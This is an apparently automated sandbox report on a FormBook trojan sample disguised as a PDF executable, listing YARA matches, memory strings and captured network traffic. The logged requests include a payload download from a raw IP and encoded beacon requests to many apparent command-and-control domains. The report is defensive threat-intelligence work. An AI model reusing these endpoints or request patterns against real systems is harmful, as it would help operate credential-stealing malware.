Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=wd6Ye7WFDj3kGWmVOBmu3CHl8Eb+rC+I8gKa3GPCKACefvwcZ2db37gmqz26Fz2MH3/e&G6GdR=axl0 HTTP/1.1Host: www.bizformspro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=4Tl7mkmR2hfQ9KBizErbd2os7QrtMSS1Xe9D2XLoGouUMWTPUZ0bimWLWeFNR5N6++45&G6GdR=axl0 HTTP/1.1Host: www.lapalmaaccesible.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=ORIqx8IF1+X+2hN52P87hXte5s/HoBMDp1q1F2AtNmI3dmVw+3KXXOfhBFQ6DTUSnU2z&G6GdR=axl0 HTTP/1.1Host: www.edelman-production.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?YtxdA=ClrLPvDXABoDT8&uZgtA=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m HTTP/1.1Host: www.credit-cards-54889.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=DdTnYTdsvxFdVgqd/vVQw4Ms7Aw/OPz+4Pu9rQ+4bXN8JsUKt08leuavRNawr2d0j4jE&YtxdA=ClrLPvDXABoDT8 HTTP/1.1Host: www.licensescape.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?YtxdA=ClrLPvDXABoDT8&uZgtA=9d/LjZG6HsJ3NNhq1rA+PmL3FctD92E4WX5AE58IVInBpcqC/aiyhlqcUifd684qA43E HTTP/1.1Host: www.emiu6696.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=RrYIP0/eJgYl3SedIjrrJhoixcqEaFywGW8DIhJA710ua/O2pKo7Jyh/i2knDDaGCnub&YtxdA=ClrLPvDXABoDT8 HTTP/1.1Host: www.dinero.newsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 185.53.179.91 185.53.179.91

Source: global traffic

HTTP traffic detected: GET /wp-content/themes/seotheme/RenHLfAoTIbu98.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 34.138.169.8Cache-Control: no-cache

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 Mar 2023 12:07:59 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 27 Mar 2023 12:09:42 GMTContent-Type: text/htmlContent-Length: 291ETag: "64217eee-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 27 Mar 2023 12:11:33 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 Mar 2023 12:12:06 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8

Source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: E-DEKONT_pdf.exe, 00000001.00000001.2981717807.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: E-DEKONT_pdf.exe, E-DEKONT_pdf.exe, 00000000.00000000.2513224221.000000000040A000.00000008.00000001.01000000.00000003.sdmp, E-DEKONT_pdf.exe, 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmp, E-DEKONT_pdf.exe, 00000001.00000000.2980628147.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: E-DEKONT_pdf.exe, 00000000.00000000.2513224221.000000000040A000.00000008.00000001.01000000.00000003.sdmp, E-DEKONT_pdf.exe, 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmp, E-DEKONT_pdf.exe, 00000001.00000000.2980628147.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: E-DEKONT_pdf.exe, 00000001.00000001.2981717807.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: E-DEKONT_pdf.exe, 00000001.00000001.2981717807.0000000000626000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: E-DEKONT_pdf.exe, 00000001.00000001.2981717807.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: E-DEKONT_pdf.exe, 00000001.00000001.2981717807.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: E-DEKONT_pdf.exe, 00000001.00000001.2981717807.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://mozilla.org0
Source: E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown

DNS traffic detected: queries for: www.goodlifeprojectofficial.com

Source: C:\Windows\explorer.exe

Code function: 2_2_0B44BF82 getaddrinfo,setsockopt,recv,

2_2_0B44BF82

Source: global traffic	HTTP traffic detected: GET /wp-content/themes/seotheme/RenHLfAoTIbu98.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 34.138.169.8Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=Omatd+gu8nRqk8Gn1x/OOoOdl/68z9YaBlXV3mZwE7pdVLuvsR/X9VlgKTB3ZiBvgeg4&G6GdR=axl0 HTTP/1.1Host: www.goodlifeprojectofficial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=yKcY3jotfSPLyB/ftSMp74iudURdb3SAsX12brKJ4aUNBvL8L7J7V3FDmQx4l6kHWp2H&G6GdR=axl0 HTTP/1.1Host: www.anotherworldrecord.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz&G6GdR=axl0 HTTP/1.1Host: www.crosswalkconsulting.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=zH93CAcCrit8Ot+ZBqn/vyMyC45co0bQrrnuYMPQl4K63vhoNC/Ny1DoALksFDMvrnCN&G6GdR=axl0 HTTP/1.1Host: www.funtime28.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=n+xM7LV5reGXDvbBpS71QDTdFlxot1/H++BJiUiW2QOMgqsfv+9mucFei6E+3dV5Q0+2&G6GdR=axl0 HTTP/1.1Host: www.couragetokingdom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=sfgefL3EX7tLrVmbrrvt2gRLjrdY9EgZIzRUFJ3eu0i+5BdWwZEHyNY8KODjs8HGUQbA&G6GdR=axl0 HTTP/1.1Host: www.peterslawonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=mO3gULgzVK9RKFx+HvnjTN/7ulsiA608FnchGSf2u+Dat8/14sLz5+BvjwL16EDGrJ0d&G6GdR=axl0 HTTP/1.1Host: www.bestpetfinds.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=utr1Sw3RyipqcYNbY+d8Z2Tb0M8wQrjWYhfSD+Y+PBLnRGhO3V2BTvKgLoZBbtabZvWX&G6GdR=axl0 HTTP/1.1Host: www.anjin98.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=wd6Ye7WFDj3kGWmVOBmu3CHl8Eb+rC+I8gKa3GPCKACefvwcZ2db37gmqz26Fz2MH3/e&G6GdR=axl0 HTTP/1.1Host: www.bizformspro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=4Tl7mkmR2hfQ9KBizErbd2os7QrtMSS1Xe9D2XLoGouUMWTPUZ0bimWLWeFNR5N6++45&G6GdR=axl0 HTTP/1.1Host: www.lapalmaaccesible.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=ORIqx8IF1+X+2hN52P87hXte5s/HoBMDp1q1F2AtNmI3dmVw+3KXXOfhBFQ6DTUSnU2z&G6GdR=axl0 HTTP/1.1Host: www.edelman-production.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?YtxdA=ClrLPvDXABoDT8&uZgtA=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m HTTP/1.1Host: www.credit-cards-54889.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=DdTnYTdsvxFdVgqd/vVQw4Ms7Aw/OPz+4Pu9rQ+4bXN8JsUKt08leuavRNawr2d0j4jE&YtxdA=ClrLPvDXABoDT8 HTTP/1.1Host: www.licensescape.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?YtxdA=ClrLPvDXABoDT8&uZgtA=9d/LjZG6HsJ3NNhq1rA+PmL3FctD92E4WX5AE58IVInBpcqC/aiyhlqcUifd684qA43E HTTP/1.1Host: www.emiu6696.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?uZgtA=RrYIP0/eJgYl3SedIjrrJhoixcqEaFywGW8DIhJA710ua/O2pKo7Jyh/i2knDDaGCnub&YtxdA=ClrLPvDXABoDT8 HTTP/1.1Host: www.dinero.newsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.7559027765.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.7560803534.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.7578827334.000000000B463000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.7559027765.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.7559027765.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.7559027765.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.7560803534.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.7560803534.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.7560803534.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: E-DEKONT_pdf.exe PID: 1508, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: E-DEKONT_pdf.exe

Source: E-DEKONT_pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.3255669405.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.7578827334.000000000B463000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.7559027765.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.7559027765.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
